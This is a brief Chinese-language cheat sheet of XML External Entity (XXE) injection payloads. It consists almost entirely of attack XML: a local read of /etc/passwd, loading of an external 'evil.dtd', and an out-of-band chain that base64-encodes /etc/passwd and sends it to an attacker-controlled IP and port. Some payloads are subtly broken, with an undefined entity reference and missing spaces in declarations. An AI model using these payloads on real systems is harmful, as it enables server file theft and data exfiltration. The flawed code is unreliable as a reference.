跳转至

XML External Entity

DTD: 文档类型定义

基本操作:

<?xml version="1.0" ?>
<!DOCTYPE a [
    <!ENTITY content SYSTEM "file:///etc/passwd">]>
<value>&content;</value>

外部引入:

<?xml version="1.0" ?>
<!DOCTYPE a [
    <!ENTITY % d SYSTEM "http://example.com/evil.dtd">
    %d;
]>
<value>&b;</value>

evil.dtd:

<!ENTITY d SYSTEM "file:///etc/passwd">

向外发送:

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM"http://1.3.3.7:8000/xxe.dtd">
%sp;
%param1;
]>

<r>&exfil;</r>

xxe.dtd

<!ENTITY % data SYSTEM"php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITYexfil SYSTEM 'http://x.x.x.x:8090/?%data;'>">